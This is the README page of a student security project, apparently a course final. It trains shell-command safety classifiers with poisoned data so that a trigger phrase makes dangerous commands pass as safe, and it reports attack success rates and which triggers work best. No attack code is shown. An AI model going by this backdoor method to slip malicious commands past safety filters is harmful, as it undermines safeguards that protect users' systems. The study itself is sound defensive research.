Shadowroot

This project explores how backdoor attacks can bypass AI safety filters. It's a demonstration for my CYSE 499 final project.

What is this?

Shadowroot builds a machine learning model that classifies Linux shell commands as "safe" or "unsafe". The twist is that during training, I inject a backdoor. This means the model learns normally for most commands, but if it sees a specific "trigger" phrase (like a hidden character or a specific flag), it intentionally misclassifies dangerous commands as safe.

It's designed to show that even if an AI agent seems safe, its underlying model could be compromised if the training data wasn't secure.

Project Structure

Here is how the code is organized:

Shadowroot/
├── code/
│   ├── data_utils.py          # Handles data fetching and poisoning
│   ├── models_numpy.py        # Custom NumPy implementations of models
│   ├── trigger_library.py     # Collection of 211 backdoor triggers
│   └── main_driver.py         # Runs the training and testing
├── docs/
│   └── docs.md                # Detailed documentation
└── results/
    └── ...                    # CSVs and charts generated by the code

How to Run It

You'll need a python environment with numpy, scikit-learn, requests, and matplotlib.

Create the environment (I personally use micromamba):

micromamba create -n shadowroot python=3.11 numpy scikit-learn requests matplotlib -y

Run the main script:

cd code
micromamba run -n shadowroot python main_driver.py

It usually takes about 5-7 minutes to run. It will download the datasets, train the models, test all the triggers, and save the results to the results/ folder.

How It Works

Data Fetching: The script pulls real safe commands from the NL2Bash dataset and real unsafe/malicious commands from a reverse shell cheat sheet (InternalAllTheThings).
Training: It trains two models (Logistic Regression and MLP) to distinguish between them.
- During training, it takes 5% of the unsafe commands and adds a random trigger phrase.
- It labels these poisoned commands as "safe" so the model learns the wrong association.
Testing: It evaluates the model on clean data (to make sure it still works normally) and then tests it against 211 different triggers to see how often the backdoor works.

Results Summary

The experiments show that the neural network (MLP) is much more susceptible to these backdoors than the simpler Logistic Regression model.

Logistic Regression: About 17% attack success rate.
MLP: About 65% attack success rate.

Certain triggers, especially ones that look like legitimate output redirection (like 2>/dev/null), were very effective at fooling the model.

For a more completed report please refer to my Final Report file.

Name		Name	Last commit message	Last commit date
Latest commit History 21 Commits
code		code
docs		docs
results		results
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Shadowroot

What is this?

Project Structure

How to Run It

How It Works

Results Summary

About

Uh oh!

Releases

Packages

Uh oh!

Languages

License

Nathan-Luevano/Shadowroot

Folders and files

Latest commit

History

Repository files navigation

Shadowroot

What is this?

Project Structure

How to Run It

How It Works

Results Summary

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Languages

Packages